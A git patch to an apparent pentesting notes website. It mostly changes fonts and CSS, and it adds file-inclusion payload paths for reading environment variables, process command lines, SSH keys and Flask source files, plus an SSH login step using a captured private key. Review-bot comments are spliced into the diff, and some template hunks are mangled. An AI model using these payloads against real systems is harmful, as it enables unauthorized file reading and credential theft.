From 2d8f726b9c6da30aca0209b9e63cf38d63d64470 Mon Sep 17 00:00:00 2001
From: hdks
Date: Sat, 15 Jun 2024 18:35:24 +0900
Subject: [PATCH] updated LFI
---
_config.ts | 4 +-
src/_components/header.vto | 4 +-
src/_includes/layouts/exploit.vto | 11 +++---
.../network/protocol/ssh-pentesting.md | 13 ++++++-
.../web/security-risk/file-inclusion.md | 17 ++++++++-
.../sql-injection-cheat-sheet.md | 8 ++--
src/styles.css | 37 +++++++++++--------
7 files changed, 62 insertions(+), 32 deletions(-)
diff --git a/_config.ts b/_config.ts
index c608e6d..3ccafcb 100644
--- a/_config.ts
+++ b/_config.ts
@@ -92,7 +92,7 @@ site
'transparent': 'transparent',
},
fontFamily: {
- basisc: ["sans-serif"],
+ base: ["Calibri, sans-serif"],
title: ["courier"],
}
}
@@ -123,7 +123,7 @@ site.process([".html"], (pages: Lume.Page[]) => {
const aElem = page.document.createElement('a');
aElem.setAttribute("href", `#${c.slug}`);
aElem.innerHTML = c.text;
- aElem.classList.add('text-sm');
+ aElem.classList.add('text-md');
aElem.classList.add('hover:brightness-200');
aElem.classList.add('break-words');
diff --git a/src/_components/header.vto b/src/_components/header.vto
index 09ee1a5..97d172e 100644
--- a/src/_components/header.vto
+++ b/src/_components/header.vto
@@ -2,7 +2,7 @@
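Review bot: `text-md` on the added line of the second `_config.ts` hunk is not one of Tailwind's default font-size utilities (the default scale runs `text-xs`, `text-sm`, `text-base`, `text-lg`, …), and the `fontFamily`/`'transparent'` keys in the first hunk suggest this is a Tailwind theme, so unless `theme.fontSize.md` is defined somewhere outside this diff the class is a no-op and the generated anchor links simply inherit their parent's size. If the intent is one step up from `text-sm`, the default utility for that is `aElem.classList.add('text-base');`. On the unchanged context line just above, `aElem.innerHTML = c.text;` inserts the heading text as markup; if `c.text` is already trusted HTML from the page's own headings that is fine, otherwise `aElem.textContent = c.text;` avoids interpreting it. The enclosing `site.process` callback starts and ends outside this hunk.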
@@ -12,7 +12,7 @@ {{# Search UI #}} - +
{{# Links #}} diff --git a/src/_includes/layouts/exploit.vto b/src/_includes/layouts/exploit.vto index 04e1c4d..2d162e5 100644 --- a/src/_includes/layouts/exploit.vto +++ b/src/_includes/layouts/exploit.vto @@ -8,7 +8,8 @@ bodyClass: body-exploit {{# Left side #}} \ No newline at end of file +
diff --git a/src/exploit/network/protocol/ssh-pentesting.md b/src/exploit/network/protocol/ssh-pentesting.md
index 4ab46ef..e7d61ba 100644
--- a/src/exploit/network/protocol/ssh-pentesting.md
+++ b/src/exploit/network/protocol/ssh-pentesting.md
@@ -7,7 +7,7 @@ tags:
- Privilege Escalation
refs:
- https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
-date: 2024-04-13
+date: 2024-06-15
draft: false
---
@@ -259,6 +259,17 @@ In remote machine,
echo '> /home//.ssh/authorized_keys
```
+
+### 4. Login with Private Key
+
+In local machine, we have a SSH private key in local machine so we can login the target SSH server with it.
+
+```bash
+# Change permission of the private key ('key', here)
+chmod 600 key
+# Login with it
+ssh victim@ -i key
+
## SSH Server
diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md
index 8ec8211..d98d6a5 100644
--- a/src/exploit/web/security-risk/file-inclusion.md
+++ b/src/exploit/web/security-risk/file-inclusion.md
@@ -5,7 +5,7 @@ tags:
- Web
refs:
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2024-04-01
+date: 2024-06-15
draft: false
---
@@ -111,8 +111,11 @@ When our payload is successful, we can additionaly investigate local files and r
?pgae=/root/.profile
?page=/root/.ssh/id_rsa
-# Environment variables
+# Processes
+?page=/proc/net/tcp
+?page=/proc/self/cmdline
?page=/proc/self/environ
+?page=/proc//cmdline
?page=/proc//environ
# Mail
@@ -173,6 +176,16 @@ When our payload is successful, we can additionaly investigate local files and r
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini
+# Flask
+?page=index.html
+?page=../__init__.py
+?page=../app.py
+?page=../db.py
+?page=../main.py
+?page=/home///app.py
+?page=/opt//app.py
+?page=/srv//app.py
+
# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
diff --git a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
index 2fd202a..81e6ab9 100644
--- a/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
+++ b/src/exploit/web/security-risk/sql-injection-cheat-sheet.md
@@ -112,7 +112,7 @@ admin or 1=1#
## Blind Injection - Timing
-Reference: [https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
+Reference: [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection#confirming-with-timing)
Using **sleep** method for each query, if results are displayed with a delay, SQLi affects that.
@@ -152,7 +152,7 @@ test' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))
## WAF Bypass
-Reference: [https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
+Reference: [OWASP](https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF)
If website filters to prevent our payloads, we need to bypass the filter.
@@ -465,7 +465,7 @@ After execution, we may get a shell of target system.
## Error-based SQLi
-Reference: [https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based)
+Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based)
We might be able to gather information of the database by leading the error message. We can construct SQLi while checking error messages. Here are MySQL injection examples.
@@ -628,7 +628,7 @@ We can write arbitary code to a file as below.
## XML Filter Bypass
-Reference: [https://portswigger.net/web-security/sql-injection](https://portswigger.net/web-security/sql-injection)
+Reference: [PortSwigger](https://portswigger.net/web-security/sql-injection)
```xml
diff --git a/src/styles.css b/src/styles.css
index 473f99a..6db3994 100644
--- a/src/styles.css
+++ b/src/styles.css
@@ -20,6 +20,9 @@
--color-emerald-dark: #064e3b;
--color-emerald-light: #059669;
+ --font-family-base: Calibri, sans-serif;
+ --font-family-title: courier, sans-serif;
+
/* Pagefind UI */
--pagefind-ui-scale: 0.6;
--pagefind-ui-primary: red;
@@ -31,7 +34,12 @@
/* --pagefind-ui-border-radius: 6px; */
--pagefind-ui-image-border-radius: 2px;
--pagefind-ui-image-box-ratio: 3 / 1;
- --pagefind-ui-font: sans-serif;
+ --pagefind-ui-font: var(--font-family-base);
+}
+
+* {
+ scrollbar-color: var(--color-pink-dark) transparent;
+ scrollbar-width: thin;
}
html,body {
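Review bot: The new `* { scrollbar-color: …; scrollbar-width: thin; }` rule at the end of the `@@ -31,7 +34,12 @@` hunk is meant to replace the `::-webkit-scrollbar` rules that the `@@ -40,20 +48,13 @@` hunk deletes, but the two are not equivalent: `scrollbar-color`/`scrollbar-width` are the standard properties, and an engine that only implements the WebKit pseudo-elements (Safari did not support the standard properties as of mid-2024, as far as I know) falls back to the default scrollbar, so the 5px pink styling is lost there. If that is an accepted trade-off, a comment above the rule such as `/* standard scrollbar properties; WebKit-only engines fall back to the default scrollbar */` would tell the next reader it was deliberate; otherwise keep the deleted `::-webkit-scrollbar*` rules next to the new one. Note that the universal selector also styles every scrollable element on the page, not just the viewport, which may or may not be intended.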
@@ -40,20 +48,13 @@ html,body {
overflow-x: hidden;
}
-a {
- color: var(--color-pink-light);
+body {
+ font-family: var(--font-family-base);
+ font-size: 1.1em;
}
-/* Scroll bar */
-::-webkit-scrollbar {
- width: 5px;
- height: 5px;
-}
-::-webkit-scrollbar-thumb {
- background: var(--color-pink-dark);
-}
-::-webkit-scrollbar-corner {
- background: none;
+a {
+ color: var(--color-pink-light);
}
/* Pagefind */
@@ -71,6 +72,7 @@ a {
#search .pagefind-ui__search-input {
transition: 0.1s;
+ font-size: 1.1em;
}
#search .pagefind-ui__search-input:focus {
outline: 1.4px solid var(--color-pink-light);
@@ -95,6 +97,7 @@ a {
#search .pagefind-ui__message {
margin: 0;
+ font-size: 0.9em;
}
#search .pagefind-ui__results-area {
@@ -118,7 +121,7 @@ a {
#search .pagefind-ui__result-link {
color: var(--color-pink-light);
- font-size: 1.1em;
+ font-size: 1.3em;
}
#search .pagefind-ui__result-link:hover {
filter: brightness(1.4);
@@ -140,10 +143,13 @@ a {
}
#search .pagefind-ui__button {
+ height: initial;
+ padding: 8px 0;
+ font-size: 1.05em;
color: var(--color-pink-light);
}
#search .pagefind-ui__button:hover {
- filter: brightness(1.4);
+ filter: brightness(1.2);
}
/* Code blocks */
@@ -279,5 +285,4 @@ td {
}
@media (min-width: 640px) {
-
}
\ No newline at end of file